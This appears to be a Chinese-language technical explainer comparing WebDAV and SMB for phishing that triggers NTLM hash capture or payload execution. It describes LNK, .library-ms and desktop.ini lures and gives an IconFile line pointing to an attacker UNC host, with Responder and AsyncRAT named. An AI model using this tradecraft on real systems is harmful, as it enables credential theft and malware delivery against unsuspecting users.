WebDAV 和 SMB 都是 Windows 环境中用于远程文件访问的协议,但它们在钓鱼攻击(尤其是利用 LNK 或 INI 文件触发回调,如 NTLM 哈希捕获或恶意 payload 执行)中的实现方式、触发机制和复杂性有显著差异。简单来说,WebDAV 更侧重于外部 phishing(如邮件附件),需要多层伪装和用户交互(如右键菜单),而 SMB 则更适合内部网络共享,直接利用文件浏览的自动行为,操作更简便。下面从协议特性、攻击流程、触发条件和优缺点四个方面详细解释。
1. 协议特性差异
- WebDAV:基于 HTTP/HTTPS 的扩展协议,允许远程服务器像本地文件系统一样挂载和访问文件。它常用于云存储或 Web 共享,但 Windows 文件资源管理器对 WebDAV 有严格的安全限制(如沙箱隔离、下载确认),无法像本地文件夹那样直接"浏览"并自动加载资源。这导致攻击需要额外的伪装文件(如 .url 或 .library-ms)来绕过。
- SMB:Windows 原生文件共享协议(Server Message Block),专为网络文件共享设计。在内部网络中,可写 SMB 共享(如 \server\share)允许直接上传文件,用户浏览时会自动发起认证(NTLM),无需额外协议转换。这使得 SMB 更"透明"和高效,尤其在域环境中。
这些差异直接影响钓鱼的门槛:WebDAV 更"Web 化",适合跨网络 phishing;SMB 更"文件系统化",适合内部滥用。
2. 攻击流程比较
-
WebDAV 钓鱼(需 library.ms + LNK 触发回调):
- 攻击者搭建 WebDAV 服务器(e.g., 使用 wsgidav 工具),上传恶意 LNK 文件(LNK 内嵌 PowerShell 命令,下载 payload 如 AsyncRAT)。
- 创建 .url 文件(Internet 快捷方式)或 .library-ms 文件(Windows 库文件),指向 WebDAV 上的 LNK。 .library-ms 是 XML 格式的虚拟容器,能伪装成"搜索库",内部 标签链接远程 WebDAV 路径。
- 通过 phishing 邮件发送 .url 或 .library-ms(常伪装成 ZIP 附件)。
- 用户双击 .url 时,浏览器/资源管理器下载 LNK;或打开 .library-ms 时,加载远程库内容,显示 LNK 图标。
- 触发回调:用户需右键 LNK(或通过 search-ms 协议搜索),调用 Windows Search 执行 LNK,导致网络回调到攻击者服务器(e.g., 下载 BAT 文件执行 payload)。整个链路依赖 search-ms URI 协议绕过直接执行限制。
这个流程"麻烦"是因为 WebDAV 不支持直接"文件夹浏览",必须用 .library-ms 模拟本地库来诱导用户交互。
-
SMB 钓鱼(直接上传 LNK 或 INI 触发回调):
- 攻击者在可写 SMB 共享中上传 LNK 文件(使用 PowerShell 创建,图标路径设为 \attackerIP@threat.png,一个不存在的远程 UNC 路径)。
- 或上传 desktop.ini 文件(文件夹配置文件),内含 [Icons] 部分链接远程 SMB 资源(e.g., IconFile=\attackerIP\icon.ico)。
- 用户访问共享(e.g., \victim-share),Windows 自动尝试加载 LNK 图标或 INI 视图自定义,导致 SMB 认证请求到攻击者服务器。
- 触发回调:无需用户打开文件,只需浏览文件夹,系统即发起 NTLM 认证,攻击者用 Responder 等工具捕获哈希。INI 更隐蔽,常用于 USB 或公共共享,伪装文件夹图标。
SMB 的流程更短:上传 → 用户浏览 → 自动回调,无需伪装链。
3. 触发条件和交互要求
- WebDAV:依赖用户主动交互(如双击 .url、右键 LNK 或搜索库)。右键触发是因为 LNK 在 WebDAV 上下文中不会自动执行(安全策略限制远程代码),需通过上下文菜单调用 explorer.exe 或 search-ms 来"激活"。如果用户不右键或搜索,就无法回调。这增加了社会工程难度。
- SMB:触发几乎被动------用户只需打开资源管理器查看共享文件夹,Windows 就会预加载图标/视图,导致认证。LNK/INI 不需执行,只需"渲染"。这在域环境中特别有效,因为 SMB 是默认协议。
4. 优缺点与适用场景
| 方面 | WebDAV 钓鱼 (library.ms + LNK) | SMB 钓鱼 (LNK 或 INI) |
|---|---|---|
| 复杂性 | 高(多文件链、服务器搭建、URI 协议绕过) | 低(直接上传、利用原生认证) |
| 触发门槛 | 用户需右键/搜索,易被中断 | 自动(浏览即触发),更可靠 |
| 检测难度 | 中等(网络流量易监,YARA/SIGMA 规则可捕) | 高(内部流量常见,伪装为合法共享) |
| 适用场景 | 外部 phishing(邮件/下载),跨防火墙 | 内部横移/公共共享,域环境 |
| 局限 | 浏览器限制多,需 HTTPS 伪装 | 需可写共享,外部需 VPN/端口开放 |
总体上,SMB 更"麻烦少"是因为它深度集成 Windows 文件系统,浏览行为天然触发认证,而 WebDAV 作为"Web 桥接"需层层欺骗来模拟类似效果。